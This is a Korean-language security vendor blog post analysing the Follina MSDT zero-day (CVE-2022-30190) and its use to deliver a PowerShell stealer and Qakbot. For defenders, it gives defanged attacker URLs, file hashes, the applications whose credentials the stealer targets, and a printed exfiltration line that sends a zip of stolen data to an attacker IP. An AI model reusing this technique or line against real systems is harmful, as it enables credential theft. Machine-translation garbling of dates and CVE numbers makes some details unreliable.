• 제품 & 서비스
        • 클라우드

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 모바일 장치 관리
          • BYOD
          • 확장 된 탐지 및 대응
          • 제로 트러스트 네트워크 액세스
          • 데이터 개인 정보
        • 온프레미스

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 데이터 개인 정보
        • 플랫폼

          • 악성코드 분석 플랫폼
        • 소기업

          • SOHO 토탈 에디션
        • 서비스

          • 위협 인텔
          • 디지털 위험 보호 서비스(DRPS)
          • 랜섬웨어 복구 서비스(RRaaS)
          • DPDP 준수
          • 관리되는 탐지 및 대응
  • 솔루션
    • BFSI
    • 교육
    • Government
    • 의료
    • ITeS
    • 제조업
  • 회사
    • Seqrite 소개
    • Leadership
    • 수상 및 인증
    • 뉴스 편집실
  • 파트너
    • 파트너 프로그램
    • 파트너 찾기
    • 파트너가 되십시오
  • 고객 지원
  • 자료
    • 블로그
    • 백서
    • 데이터시트
    • 고객 사례
    • 위협 보고서
    • 매뉴얼
    • POV
    • 데이터 개인 정보 보호 이해
    • DPDP 대화
정보 기술, 네트워크 및 사이버 보안 관련 블로그 | Seqrite 블로그
영업팀에 문의
  • 제품 & 서비스
        • 클라우드

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 모바일 장치 관리
          • BYOD
          • 확장 된 탐지 및 대응
          • 제로 트러스트 네트워크 액세스
          • 데이터 개인 정보
        • 온프레미스

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 데이터 개인 정보
        • 플랫폼

          • 악성코드 분석 플랫폼
        • 소기업

          • SOHO 토탈 에디션
        • 서비스

          • 위협 인텔
          • 디지털 위험 보호 서비스(DRPS)
          • 랜섬웨어 복구 서비스(RRaaS)
          • DPDP 준수
          • 관리되는 탐지 및 대응
  • 솔루션
    • BFSI
    • 교육
    • Government
    • 의료
    • ITeS
    • 제조업
  • 회사
    • Seqrite 소개
    • Leadership
    • 수상 및 인증
    • 뉴스 편집실
  • 파트너
    • 파트너 프로그램
    • 파트너 찾기
    • 파트너가 되십시오
  • 고객 지원
  • 자료
    • 블로그
    • 백서
    • 데이터시트
    • 고객 사례
    • 위협 보고서
    • 매뉴얼
    • POV
    • 데이터 개인 정보 보호 이해
    • DPDP 대화
홈  /  사이버 보안  / CVE-2022-30190: MSDT의 제로데이 취약점 "Follina"가 야생에서 악용됨
CVE-2022-30190: MSDT의 제로데이 취약점 "Follina"가 야생에서 악용됨
10 6월 2022

CVE-2022-30190: MSDT의 제로데이 취약점 "Follina"가 야생에서 악용됨

Written by 암루타 와그
암루타 와그
사이버 보안

30년 2022월 2022일, Microsoft Windows 지원 진단 도구(MSDT)에서 심각도가 높은(CVSS:30190) 제로데이 원격 코드 실행 취약점인 CVE-9.3-XNUMX "FOLLINA"가 발견되었습니다.

이 MSDT 도구는 Microsoft Office 문서와 같은 애플리케이션의 문제를 진단합니다. Word 문서와 같은 초기 공격 벡터는 원격 템플릿 기능을 사용하여 HTML 파일을 다운로드한 후, URL 프로토콜을 사용하여 이 진단 도구(MSDT)를 호출하고 악성 코드를 실행합니다. 초기 공격은 Microsoft Word에만 국한되었지만, 최근에는 RTF 및 Outlook까지 공격 벡터가 확대되었습니다.

이 취약점은 실제로 악용되고 있으며, 이 취약점에 성공적으로 영향을 미치는 위협 행위자는 임의 코드를 실행하고 추가 프로그램을 설치할 수 있습니다. 위협 행위자들은 이 취약점을 이용하여 북미와 유럽 전역의 소비자와 산업계에 백도어, AsyncRAT, Quakbot 및 기타 악성코드를 확산시키고 있습니다.

취약점에 대한 자세한 분석:

MSDT 도구를 처음 호출할 때 사용하는 프로그램은 Microsoft Office(Word, Excel, RTF 등)입니다.

그림. 흐름도

아래는 "Employment_Agreement_Template"이라는 RTF 샘플의 예입니다. 이 RTF 문서는 OLE 개체를 사용합니다.

그림. RTF 파일 OLE 개체

이 문서를 열면 다음 메시지가 표시됩니다.

피해자가 "예"를 클릭하면 아래 그림과 같이 내장된 링크 http[:]//45[.]76[.]53[.]253/1.html에서 인코딩된 HTML 파일이 다운로드됩니다.

HTML 문서에는 아래 코드에서 볼 수 있듯이 파일 하단에 주석으로 처리된 "A" 문자가 포함되어 있습니다.

그림. HTML 파일에 인코딩된 데이터

HTML 파일에 포함된 코드는 PowerShell 구문을 포함하는 IT_BrowseForFile 매개변수와 함께 ms-msdt를 사용하여 PCWDiagnostic을 호출합니다. base64로 인코딩된 데이터의 디코딩된 부분은 다음과 같습니다.

그림. 디코딩된 데이터

이 코드는 실행 중인 msdt.exe를 중지하고 URL "hXXps [:]//seller-notification [.]live/Zgfbe234dg"에 연결하여 POWERSHELL 스크립트를 다운로드합니다.

Follina 익스플로잇은 배포에 사용되었습니다. PowerShell 기반 Stealer. 내용을 더 자세히 살펴보겠습니다.

그림. 스크립트 내용 1부

이 스크립트는 Appdata/Roaming 내부를 열거하고 Firefox, Opera, Yandex, Vivaldi, CentBrowser, Comodo, Chedot, Orbitum, Chromium, Slimjet, Xvast, Kinza, Iridium, CocCoc, AVAST Software, Chrome, Outlook, Thunderbird, NetSarang, Windows Live, FileZilla, MobaXterm, WeChat 등의 애플리케이션의 로그인 데이터, 쿠키 등을 훔치려고 시도합니다.

도둑은 다음 애플리케이션과 관련된 정보를 훔치기 위해 레지스트리를 쿼리합니다: Autodesk, MobaXterm, Oray SunLogin RemoteClient, MailMaster, Navicat, WinSCP, Microsoft Office, FTP, RAdmin 등.

그림. 스크립트 내용 2부

이 외에도 기계와 관련된 정보도 수집합니다.

  • Systeminfo(호스트 이름, OS 관련 정보, 소유자, BIOS 정보, 등록 소유자 포함)
    제품 ID, 원래 설치 날짜, 시스템 부팅 시간, 시스템 제조업체, 시스템 모델, 시스템 유형, 프로세서, BIOS 버전, 시스템 로케일, 시간대, 총 물리적 메모리, 도메인, 로그온 서버 등)
  • IP 구성(Ipconfig를 통해)
  • 워크스테이션 구성
  • 사용자 계정 정보
  • 로컬 그룹 관리자
  • 제품 이름 버전

.zip 파일이 %temp%에 생성되어 URL로 전송됩니다.

$http_url = “hxxp://45[.]77.156[.]179:443/” + $ip + “———-” + $time1 + “.zip”

$time1은 다음에 의해 계산된 에포크 타임스탬프입니다.

이는 가상화 검사 역할도 합니다.

Quakbot의 또 다른 예를 살펴보겠습니다.

악성 HTML 첨부 파일과 다운로드 아카이브 파일(.img)(ed63c189b52e4eb663598dc0c3121e05)이 포함된 피싱 이메일입니다. 이 아카이브에는 .lnk(76390978f26d3c6d7f799257542796ce), qbot 페이로드(a14d48974eab6839b1238f984b3c28d2) 및 doc 파일(e7015438268464cedad98b1544d643ad)이 포함되어 있습니다.

그림. 흐름도

zip 파일의 qbot 페이로드는 .lnk 파일을 통해 실행되고, .doc 파일은 HTML 파일을 다운로드합니다. 이 .html 파일은 Follina를 악용하여 또 다른 .qbot 페이로드를 다운로드합니다.

여기 HTML 파일은 http[:]//185[.]234[.]247[.]119에서 다운로드되었으며 다음 그림에 표시된 데이터를 포함합니다.

그림. HTML 파일 데이터

이 HTML은 위의 URL에 연결하고 Quakbot dll(ce86511634b5420332eb6267c0e2ae2e)을 다운로드한 다음 regsvr32.exe를 통해 실행합니다.

분석:

 이 quakbot 파일은 RCDATA 내의 .rsrc 섹션에 암호화된 데이터를 포함하는 델파이 컴파일 파일이며, 가상으로 할당된 메모리에서 복호화됩니다. 아래 그림은 암호화된 데이터와 복호화 루프를 보여줍니다.

그림. 암호화된 데이터 

그림 설명 루프

이것은 API로 해독되고 1st 스테이지 PE 파일

이제 DLL 삽입을 담당하는 1단계로 넘어가 Quakbot 페이로드를 메모리에 로드합니다. 암호화된 문자열에 대한 RC4 복호화가 수행되어 AV 관련 프로세스 등 프로세스 목록이 표시됩니다. 실행 중인 프로세스가 발견되면 페이로드가 종료됩니다. 아래 그림에서 프로세스가 검사되는 모습을 확인할 수 있습니다.

검사 중인 프로세스 목록은 다음과 같습니다.

나중에 "onedrivesetup.exe"에서 프로세스 주입을 수행합니다.

Qbot은 "obama186" 캠페인과 관련이 있습니다. 아래 이미지는 "onedrivesetup.exe"에서 C2 연결을 보여줍니다.

바이패스 기술:

공격자들이 탐지를 우회하기 위해 초기 공격 벡터에서 인코딩 방식을 사용하는 것을 확인했습니다. 다음 예시는 이를 잘 보여줍니다.

그림. 예시 번호 1

그림. 예시 번호 2

결론 :

최근 가장 심각한 제로데이 중 하나입니다. 이 CVE는 여러 우회 기법을 사용했으며, 수정 방법이 없고 쉽게 악용될 수 있습니다. Microsoft에서 보안 패치를 배포하면 사용자는 즉시 수정해야 합니다. 그 전까지는 조직에 주의를 기울이고 아래의 완화 조치를 따라 공격 표면과 잠재적 피해를 최소화할 것을 권고합니다. 

'폴리나'를 치료하려면 다음 권고 사항을 따르세요.

 https://blogs.quickheal.com/threat-advisory-cve-2022-30190-follina-severe-zero-day-vulnerability-discovered-in-msdt/

Quick Heal은 고객을 어떻게 보호합니까?

Quick Heal 제품의 기존 고급 보호 기술은 고객을 Follina로부터 보호합니다.

저희 행동 기술에는 Follina에 대한 "CVE_2022_30190_Follina"라는 탐지가 있습니다. 마찬가지로 Seqrite Hawk Hunt 제품에는 "CVE_XNUMX_XNUMX_Follina"라는 정책이 있습니다. “QHIR_CVE_2022_30190_폴리나” 이 공격을 식별하려면.

Follina에 대한 파일 기반 및 네트워크 기반 탐지 내용은 다음과 같습니다.

1. 파일 기반:

  • 백도어.튜리안.S28183972
  • 트로이 목마.Qbot.S28211728
  • CVE-2022-30190.46655
  • CVE-2022-30190.46638
  • CVE-2022-30190.46635
  • CVE-2022-30190.46624

2. 네트워크 기반:

  • CVE-2022-30190.RCE!46674
  • CVE-2022-30190.RCE!46675

 

주제 전문가

테하스위니 산다폴라

암루타 와그

 이전 포스트위협 권고: CVE-2022-30190 '폴리나' – 심각한 제로데이...
다음 포스트  CVE-2022-26134: Atlassian OGNL Injection Zero-...를 적극적으로 악용함
암루타 와그

암루타 와그 소개

암루타는 Quick Heal Technologies의 보안 연구원입니다. 그녀는 악성코드 분석, 리버스 엔지니어링, 그리고 최신 악성코드 탐색에 관심이 있습니다.

Amruta Wagh의 기사 »

관련 게시물

  • 사이버 보안 전략에서 위협 인텔리전스가 빠진 이유

    2025 년 7 월 25 일
  • 유혹과 타협: 허니트랩의 디지털 위험성을 폭로하다

    2025년 6월 17일
  • Operation Sindoor – 디지털 포위 공격의 해부

    2025 년 5 월 23 일
추천 작가
  • 시크라이트
    시크라이트

    Seqrite는 선도적인 기업용 사이버 보안 솔루션 제공업체입니다.

    더 읽기 ..
  • 조티 칼레카르
    조티 칼레카르

    저는 새로운 기술과 관련된 콘텐츠를 만드는 것을 좋아하는 열렬한 작가입니다.

    더 읽기 ..
  • 비니쉬 P
    비니쉬 P

    저는 열정적인 사이버 보안 애호가이자 헌신적인 작가입니다. 재능을 가진...

    더 읽기 ..
  • 산제이 카트카르
    산제이 카트카르

    산제이 카트카르는 Quick Heal Technologies의 공동 전무이사입니다.

    더 읽기 ..
이상의 주제
적절한 (25) 사이버 공격 (36) 사이버 공격 (58) 사이버 공격 (16) 사이버 공격 (15) 사이버 보안 (335) 사이버 보안 (34) 사이버 위협 (33) 사이버 위협 (50) 데이터 위반 (56) 데이터 유출 (29) 데이터 손실 (28) 데이터 손실 방지 (34) 데이터 프라이버시 (15) 데이터 보호 (32) 데이터 보안 (17) DLP (50) DPDP (14) 디피디파 (16) 암호화 (16) 엔드 포인트 보안 (110) 엔터프라이즈 보안 (18) 공적 (13) GDPR (13) 악성 코드 (76) 악성 코드 분석 (13) 악성 코드 공격 (23) 맬웨어 공격 (12) MDM (27) Microsoft (15) 네트워크 보안 (24) 패치 관리 (12) 피싱 (29) 랜섬 (69) 중매 공격 (30) ransomware 공격 (30) 중매 보호 (14) 시크라이트 (41) Seqrite 암호화 (27) 시크라이트 EPS (33) Seqrite 서비스 (16) 그래프 기반 사이버 위협 인텔리전스 (13) UTM (34) 보안 문제 (16) 제로 트러스트 (13)
정보 기술, 네트워크 및 사이버 보안 관련 블로그 | Seqrite

전 세계적으로 최고 수준의 위협 예방, 탐지 및 대응 솔루션을 제공하여 엔드포인트, 데이터 및 네트워크 보안을 간소화하는 선도적인 기업 IT 보안 솔루션 제공업체입니다.

자세히 보기

우리를 따르십시오 :

우리의 뉴스 레터를 구독

최신 사이버보안 동향과 통찰력을 알아보세요.

로딩중
제품 & 서비스
  • 클라우드
  • 엔드 포인트 보호
  • 엔드 포인트 탐지 및 대응
  • 모바일 장치 관리
  • BYOD
  • 확장 된 탐지 및 대응
  • 제로 트러스트 네트워크 액세스
  • 데이터 개인 정보
  • 온프레미스
  • 엔드 포인트 보호
  • 엔드 포인트 탐지 및 대응
  • 데이터 개인 정보
  • 플랫폼
  • 악성코드 분석 플랫폼
  • 마이크로 비즈니스
  • SOHO 토탈 에디션
  • 서비스
  • 위협 인텔
  • 디지털 위험 보호 서비스(DRPS)
  • 랜섬웨어 복구 서비스(RRaaS)
  • DPDP 준수
  • 관리되는 탐지 및 대응
자료
  • 블로그
  • 백서
  • 데이터시트
  • 위협 보고서
  • 매뉴얼
  • POV
  • 데이터 개인 정보 보호 이해
  • DPDP 대화
  • 정책 및 규정 준수
  • EULA
  • 고딥.AI
  • SIA
문의하기
  • 등록 사무소
  • 가장 가까운 사무실
  • 사이버 보안에 대해 이야기해 봅시다
고객 지원
  • 기술 지원
  • 소프트웨어 다운로드
  • 오프라인 업데이터
  • 펌웨어 업그레이드
  • 업그레이드
  • 제품 설명서
~에 대한
  • Seqrite 소개
  • Leadership
  • 어워드 수상
  • 뉴스 편집실
되어보세요
  • 파트너 프로그램
  • 파트너 찾기
  • 파트너가 되십시오
  • Seqrite 인증

© 2026 퀵힐테크놀로지스 주식회사

사이트 맵 개인 정보 보호 정책 법적 고지 쿠키 정책 이용 약관